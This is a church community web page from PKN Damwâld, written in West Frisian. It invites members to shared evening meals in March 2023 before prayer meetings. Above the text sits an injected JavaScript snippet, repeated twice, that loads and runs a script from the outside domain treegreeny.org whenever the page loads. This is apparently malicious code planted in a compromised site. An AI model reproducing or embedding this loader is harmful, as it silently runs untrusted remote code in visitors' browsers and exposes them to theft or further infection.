;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Verbinding op weg naar de Protestantse Gemeente Damwâld ... lekker ite! - PKN Damwâld

Verbinding op weg naar de Protestantse Gemeente Damwâld … lekker ite!

Gepubliceerd op: vrijdag 24 februari 2023

Leave gemeenteleden,

Mei elkoar prate, bidde en sjonge ferbynt en kin allegearre as we mei elkoar ite. Dêrom is foar jong en âld op jûntiid plak oan’e tafel yn’e tsjerke om waarm te iten. De earste jûn is op woansdei 8 maart foarôfgeand oan de bidstond yn’e Ontmoeting en de twadde jûn is moandei 13 maart yn’t Skûlplak. De trêde jûn is tiisdei 21 maart yn’e Ontmoeting. Alle kearen is de ynrin fanôf 17.30 ûre, We begjinne om 18.00 ûre. Graach sa gau mogelik oanmelde. Yn elts gefal foar 5 maart!

Aanmeldformulier: zie bijlage!